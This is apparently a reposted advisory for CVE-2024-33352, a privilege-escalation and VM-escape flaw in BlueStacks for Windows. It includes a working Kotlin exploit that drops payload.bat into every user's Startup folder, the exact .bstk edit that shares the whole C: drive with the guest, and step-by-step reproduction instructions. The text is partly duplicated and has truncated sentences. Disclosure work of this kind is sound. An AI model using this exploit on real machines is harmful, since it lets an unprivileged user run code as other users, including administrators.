CVEID: CVE-2024-33352
Bluestacks Advisory ID: pending
Name of the affected product(s) and version(s): BlueStacks for Windows (versions prior to 10.40.1000.502)
Vulnerability type: CWE-552: Files or Directories Accessible to External Parties
Poc Exploit.kt code :
Summary
BlueStacks is an Android emulator which runs the guest Android system within a virtual machine. Because BlueStacksstores virtual machine configuration files in a world-writeable directory and shares them across different OS users,it is possible for an unprivileged user to backdoor an image that would then gain code execution capabilitiesof a privileged user.
Description
BlueStacks configuration is stored globally in the ProgramData directory with the following ACLs
The (F) permission assigned to Everyone means that all users can fully access and modify the contents.This allows modifying both the virtual drives (storage used by emulators) and their Virtual Box config files.Editing the former gives the attacker an opportunity to add automatically executed code to the underlying virtualmachine, creating a backdoor which will run whenever a legitimate user starts the emulator. Editing the latterallows reconfiguring shared directory settings to include the entire C drive, allowing the code to escape fromVirtual Box into the host operating system.
To enable a virtual machine escape, the attacker would modify the file
to
which will allow full access to the Windows filesystem (with restrictions depending on the access level of userrunning BlueStacks) through
After configuring shared folders to enable VM escape, the attacker needs to modify the virtual drive's filesystemto add code that will be executed when run by the privileged user. There are multiple ways of doing this, butthe most straightofrward one demonstrated in the PoC is by installing an application which starts automaticallythrough the use of
Final step of the exploitation is performing the escape. With access to the host OS filesystem, it can be achievedby adding an executable file to current user's
Reproduction
Bluestacks Advisory ID: pending
Name of the affected product(s) and version(s): BlueStacks for Windows (versions prior to 10.40.1000.502)
Vulnerability type: CWE-552: Files or Directories Accessible to External Parties
Poc Exploit.kt code :
Java:
package mmiszczyk.bluestackshack
import android.util.Log
import java.io.File
class Exploit {
private val TAG = "EXPLOIT"
private val C_DRIVE = File("/mnt/windows/BstSharedFolder/")
private val USERS = File(C_DRIVE, "Users/")
fun installBackdoor(payload: String){
enumerateUsers().forEach{addPayloadToAutorun(it, payload)}
}
fun enumerateUsers(): List<String> {
return USERS.list()?.filter { it !in listOf("Public", "Default", "All Users", "desktop.ini") } ?: listOf("")
}
fun addPayloadToAutorun(user: String, payload: String){
val d = File(File(USERS, user), "AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")
if(!d.exists() || !d.isDirectory){
Log.e(TAG, "Cannot access ${d.absolutePath}; skipping")
return
}
try{
File(d, "payload.bat").writeText(payload)
} catch (e: Exception){
Log.e(TAG, "Error backdooring user $user")
Log.e(TAG, e.toString())
return
}
Log.d(TAG, "Successfully backdoored user $user")
}
}Summary
BlueStacks is an Android emulator which runs the guest Android system within a virtual machine. Because BlueStacksstores virtual machine configuration files in a world-writeable directory and shares them across different OS users,it is possible for an unprivileged user to backdoor an image that would then gain code execution capabilitiesof a privileged user.
Description
BlueStacks configuration is stored globally in the ProgramData directory with the following ACLs
Код:
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Successfully processed 1 files; Failed processing 0 filesThe (F) permission assigned to Everyone means that all users can fully access and modify the contents.This allows modifying both the virtual drives (storage used by emulators) and their Virtual Box config files.Editing the former gives the attacker an opportunity to add automatically executed code to the underlying virtualmachine, creating a backdoor which will run whenever a legitimate user starts the emulator. Editing the latterallows reconfiguring shared directory settings to include the entire C drive, allowing the code to escape fromVirtual Box into the host operating system.
To enable a virtual machine escape, the attacker would modify the file
C:\ProgramData\BlueStacks_nxt\Engine\Nougat32\Nougat32.bstk (or a similar file for specific virtualmachine used by the Bluestacks version of the victim; different BlueStacks versions can use other Android VMs)and modify it to change the line
Код:
<SharedFolder name="BstSharedFolder" hostPath="C:\ProgramData\BlueStacks_nxt\Engine\UserData\SharedFolder" writable="true" autoMount="false"/>to
Код:
<SharedFolder name="BstSharedFolder" hostPath="C:\" writable="true" autoMount="false"/>which will allow full access to the Windows filesystem (with restrictions depending on the access level of userrunning BlueStacks) through
/mnt/windows/BstSharedFolder.After configuring shared folders to enable VM escape, the attacker needs to modify the virtual drive's filesystemto add code that will be executed when run by the privileged user. There are multiple ways of doing this, butthe most straightofrward one demonstrated in the PoC is by installing an application which starts automaticallythrough the use of
BOOT_COMPLETED broadcast receiver.Final step of the exploitation is performing the escape. With access to the host OS filesystem, it can be achievedby adding an executable file to current user's
AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup.While the application has no way of knowing who the current user is, it can simply enumerate the subdirectoriesin C:\Users and attempt writing to all of them.Reproduction
- Set up attacker and victim accounts, preferably making attacker unprivileged and victim the administrator
- Victim: install the vulnerbale version of BlueStacks
- Attacker: modify Nougat32.bstk to give Android access to C drive
- Attacker: run the Android system and install a malicious application on it
- Victim: run BlueStacks, causing the malicious application to drop payload in your startup directory
- Victim: reboot the machine and log into your account again
- Startup payload should be executed with your privileges